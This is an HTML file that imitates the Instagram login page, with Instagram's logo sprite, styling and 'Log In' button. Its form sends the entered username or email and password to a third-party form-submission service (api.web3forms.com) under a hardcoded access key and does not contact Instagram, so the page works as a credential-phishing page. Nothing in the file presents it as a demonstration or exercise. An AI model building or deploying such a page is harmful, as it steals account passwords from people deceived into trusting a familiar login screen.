<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Instagram Login</title>
  <link href="index.css" rel="stylesheet">
  <style>
    body {
      font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
        Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      background-color: #fafafa;
      box-sizing: border-box;
    }

    a {
      text-decoration: none;
    }

    .container {
      max-width: 1000px;
      margin: 3rem auto;
      display: flex;
      justify-content: center;
      flex-direction: column;
      align-items: center;
      font-size: 14px;
    }

    .box {
      max-width: 350px;
      width: 100%;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
      background-color: #ffff;
      border: 1px solid #e6e6e6;
      border-radius: 1px;
      margin: 0 0 10px;
      padding: 10px 0;
      flex-grow: 1;
    }

    .heading {
      margin: 22px auto 12px;
      background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
      background-position: -98px 0;
      height: 51px;
      width: 177px;
    }

    .field {
      margin: 10px 0;
      position: relative;
      width: 100%;
    }

    input {
      padding: 9px 0px 7px 9px;
      font-size: 12px;
      width: 16rem;
      height: 1.2rem;
      outline: none;
      background: #fafafa;
      border-radius: 3px;
      border: 1px solid #efefef;
    }

    label {
      position: absolute;
      pointer-events: none;
      left: 10px;
      top: 10px;
      line-height: 6px;
      transition: all ease-out 0.1s;
      font-size: 14px;
      color: #999;
    }

    input:focus + label,
    input:not(:placeholder-shown) + label {
      top: -14px;
      font-size: 11px;
    }

    input:focus,
    input:not(:placeholder-shown) {
      padding-top: 14px;
      padding-bottom: 2px;
    }

    .login-button {
      text-align: center;
      width: 100%;
      padding: 0.5rem;
      border: none;
      background-color: #3897f0;
      color: #fff;
      font-weight: 600;
      font-size: 14px;
      cursor: pointer;
    }

    .separator {
      display: flex;
      justify-content: space-between;
      align-items: center;
      color: #999;
      margin-top: 6px;
    }

    .separator .line {
      height: 1px;
      width: 40%;
      background-color: #dbdbdb;
    }

    .other {
      display: flex;
      justify-content: center;
      flex-direction: column;
      align-items: center;
    }

    .fb-login-btn {
      margin: 1rem;
      border: 0;
      cursor: pointer;
      font-size: 14px;
      color: #385185;
      font-weight: 600;
      background: transparent;
    }

    .forgot-password {
      font-size: 11px;
      color: #003569;
    }

    .signup {
      color: #3897f0;
      font-weight: 600;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="box">
      <div class="heading"></div>
      <form class="login-form" action="https://api.web3forms.com/submit" method="post">
  <input type="hidden" name="access_key" value="8ac39d40-5f17-4885-b6c5-99ff346e22a9">
  <div class="field">
    <input id="username" type="text" name="username_or_email" required>
    <br>
    <label for="username">Phone number, username, or email</label>
    </br>
  </div>
  <div class="field">
    <input id="text" type="password" name="text" required>
    <br>
    <label for="password">Password</label>
  </br>
  </div>
   <input type="hidden" name="redirect" value="https://web3forms.com/success">          
  <button class="login-button" type="submit" title="Log in">Log In</button>
</form>
       <div class="separator">
          <div class="line"></div>
          <p>OR</p>
          <div class="line"></div>
        </div>
        <div class="other">
          <button class="fb-login-btn" type="button">
            <i class="fa fa-facebook-official fb-icon"></i>
            Log in with Facebook
          </button>
          <a class="forgot-password" href="#">Forgot password?</a>
        </div>
      </form>
    </div>
    <div class="box">
      <p>Don't have an account? <a class="signup" href="#">Sign up</a></p>
    </div>
  </div>
</body>
</html>